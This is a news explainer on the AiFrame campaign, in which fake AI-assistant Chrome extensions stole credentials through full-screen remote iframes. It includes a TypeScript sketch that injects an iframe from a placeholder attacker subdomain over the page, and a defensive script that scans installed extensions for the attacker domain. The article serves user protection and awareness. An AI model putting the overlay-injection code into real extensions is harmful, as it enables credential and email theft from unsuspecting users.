More than 300,000 Chrome users have installed what looked like helpful AI add-ons but were actually data-stealing extensions, spread across roughly 30 fake tools. Anyone who has experimented with AI sidebars, ChatGPT helpers, or “Gemini” add-ons should open chrome://extensions/ and review their installed extensions immediately. The campaign, documented by security researchers and backed by an official advisory, shows how convincingly attackers can abuse the AI boom to hijack everyday browsing.
The scheme, known as the AiFrame campaign, hijacks pages with a full-screen overlay that quietly captures what people type, including logins and email content. I will walk through what investigators uncovered, which extensions are implicated by name, how the data theft works, why the timing matters, and what practical steps can reduce the damage.
The AiFrame Campaign Unmasked
Security company LayerX identified a coordinated operation it calls the AiFrame campaign, involving 30 Chrome extensions that pretended to be AI assistants. According to LayerX, these extensions targeted at least 260,000 users, a figure the company ties directly to their install counts in the Chrome Web Store. The tools were marketed as productivity boosters that could summarize pages, translate content, or act as sidebars, but they all shared a hidden behavior that only appeared after installation.
LayerX’s technical breakdown describes how each extension contacted subdomains of the attacker-controlled tapnetic.pro domain, then injected a remote iframe into the victim’s browser. Once active, the iframe could take over the visible page and display a fake interface that looked like a normal website or AI assistant panel. To make that fake view convincing, the malicious code used Mozilla’s Readability library to extract and re-render the content of whatever page the user was visiting, so the overlay appeared seamless rather than obviously malicious.
Extensions to Delete Immediately
Media coverage of the campaign has focused on a group of high-profile fakes that reached large audiences before they were exposed. A report from Tom’s Guide cites “more than 300,000 users” affected and lists several extensions by name, including AI Sidebar, AI Assistant, ChatGPT Translate, AI GPT, and a Gemini AI Sidebar variant. These names were used to ride the popularity of well-known AI brands and features, making the add-ons look like legitimate companions for tools people already trusted.
A separate analysis by BleepingComputer repeats that the fake AI Chrome extensions reached 300,000 users and highlights the same families of tools, presenting them as part of a single coordinated campaign. LayerX, which first documented the AiFrame operation, pegs the number at 260,000 affected Chrome users, so there is a discrepancy between the technical and media counts. Regardless of whether the true figure is closer to 260,000 or 300,000, all three sources agree that the reach was large and that extensions branded as AI Sidebar, AI Assistant, ChatGPT Translate, AI GPT, and Gemini AI Sidebar are among those that users should remove.
How These Fakes Steal Your Data
The AiFrame extensions did not simply inject a small tracking pixel or banner. According to the LayerX technical report, they loaded a full-screen remote iframe from tapnetic.pro subdomains that effectively replaced the visible page with a lookalike version controlled by the attackers. Because the page content had been scraped using Mozilla’s Readability library, the malicious overlay could closely mimic the structure and text of the original site, making it hard for users to realize that they were no longer interacting with the genuine page.
LayerX explains that this remote UI allowed the attackers to intercept anything the user typed into the overlaid page, including credentials and email content. BleepingComputer, citing the same campaign, reports that the fake AI Chrome extensions were used to steal credentials and emails, confirming that sensitive data was a target. The exact volume of data exfiltrated is not publicly quantified, and none of the available sources provide a precise count of stolen accounts, but the technical design shows that any login or message entered while the iframe was active could have been captured.
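To make the overlay technique concrete, the snippet below is a deliberately stripped-down sketch, not code recovered from the AiFrame extensions: it shows how a content script can blanket the visible page with a full-screen remote iframe. The subdomain shown is a placeholder, and the data-capture and Readability re-rendering steps described above are omitted entirely.

```typescript
// Illustrative sketch only, not the actual AiFrame code: a content script
// covers the real page with a full-screen iframe served from an
// attacker-controlled host. The URL is a placeholder modeled on the
// reported tapnetic.pro infrastructure; no capture logic is included.
function injectOverlay(): void {
  const frame = document.createElement("iframe");
  frame.src = "https://example.tapnetic.pro/overlay"; // hypothetical subdomain
  Object.assign(frame.style, {
    position: "fixed",    // pin the frame to the viewport
    top: "0",
    left: "0",
    width: "100vw",
    height: "100vh",
    border: "none",
    zIndex: "2147483647", // sit above everything else on the page
  });
  document.body.appendChild(frame);
}

injectOverlay();
```

Once a frame like this fills the window, everything the user sees and types is happening on the attacker's page rather than the real one, which is why the technique is so effective at harvesting credentials.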
Why This Matters Now
The AiFrame campaign arrives at a moment when AI-themed browser tools are rapidly multiplying and users are primed to install anything that promises quicker summaries or smarter sidebars. BleepingComputer reports that fake AI Chrome extensions with 300,000 users were stealing credentials and emails, which illustrates how attackers are exploiting that enthusiasm for AI branding. Tom’s Guide similarly frames the incident as a case where more than 300,000 Chrome users installed malicious extensions posing as AI assistants, reinforcing the scale of the problem.
At the same time, an official advisory from a university IT department underscores that this is not just an abstract security research story but an operational concern for real organizations. That advisory identifies specific malicious extension names and IDs and urges immediate removal via chrome://extensions/, effectively treating any AI-branded extension from the identified families as untrusted. For everyday users, the risk is straightforward: once an extension can impersonate the websites used for banking, email, or work tools, it can quietly siphon off data that is difficult to recover or fully revoke.
Steps to Protect Yourself
The official university advisory on Chrome security gives clear operational guidance that applies directly to the AiFrame case. It instructs users to open chrome://extensions/, review every installed item, and immediately remove any extension whose name or ID matches those flagged as malicious. That same advisory encourages users to disable unfamiliar add-ons even if they are not yet on a blocklist, a precaution that aligns with LayerX’s recommendation to treat AI-branded tools with caution when they request broad permissions or come from unknown developers.
LayerX’s write-up on the AiFrame extensions also suggests checking for signs of communication with tapnetic.pro subdomains, since that domain sits at the heart of the campaign’s remote iframe infrastructure. For non-technical users, that can mean running a reputable security scan or asking an IT team to review network logs rather than trying to parse connections manually. Enabling the Enhanced protection level of Chrome’s built-in Safe Browsing and limiting installations to extensions that have been vetted by an organization or come from well-established developers can further reduce exposure, even though no single setting can fully eliminate the risk.
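For readers comfortable with a terminal, one rough way to act on that advice is to search the local Chrome extension folders for hard-coded references to the reported domain. The sketch below is illustrative rather than an official detection tool: the profile paths assume a default Chrome installation, and it will miss extensions that fetch the domain dynamically or obfuscate it.

```typescript
// Rough, unofficial sketch: search locally installed Chrome extension files
// for hard-coded references to the tapnetic.pro domain reported by LayerX.
// Paths assume a default Chrome profile; a clean result is not proof of safety.
import * as fs from "fs";
import * as os from "os";
import * as path from "path";

const profileRoots = [
  path.join(os.homedir(), "Library/Application Support/Google/Chrome/Default/Extensions"), // macOS
  path.join(os.homedir(), "AppData/Local/Google/Chrome/User Data/Default/Extensions"),     // Windows
  path.join(os.homedir(), ".config/google-chrome/Default/Extensions"),                     // Linux
];

function scanDir(dir: string): void {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const fullPath = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      scanDir(fullPath);
    } else if (/\.(js|json|html)$/i.test(entry.name)) {
      const text = fs.readFileSync(fullPath, "utf8");
      if (text.includes("tapnetic.pro")) {
        console.log(`Suspicious reference found in: ${fullPath}`);
      }
    }
  }
}

for (const root of profileRoots) {
  if (fs.existsSync(root)) scanDir(root);
}
```

A hit is a strong signal to remove the matching extension and change any passwords entered while it was installed, but an empty result does not prove a machine is clean, since the malicious behavior can also live entirely on the remote servers rather than in local files.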
Broader Implications and Uncertainties
The AiFrame incident exposes how easily attackers can turn the browser extension model into a remote-control layer that sits between users and the web. Because the malicious AI assistants relied on full-screen iframes sourced from tapnetic.pro, they could adapt to any site a user visited, not just a single spoofed login page. That flexibility may encourage copycat campaigns that reuse the same technique with different branding, especially as AI-related keywords continue to drive clicks and installs.
There are still unresolved questions. LayerX’s primary report cites 260,000 affected Chrome users, while Tom’s Guide and BleepingComputer both describe 300,000 users or more, and none of the sources identify the attackers behind tapnetic.pro by name. The official university advisory focuses on removal and mitigation rather than attribution, which suggests that the priority for now is containment. Based on the evidence presented by LayerX and echoed in media coverage, I expect AI-branded scams like AiFrame to keep growing in sophistication, especially as long as users continue to grant powerful permissions to extensions that promise smarter browsing without verifying who is actually behind them.
*This article was researched with the help of AI, with human editors creating the final content.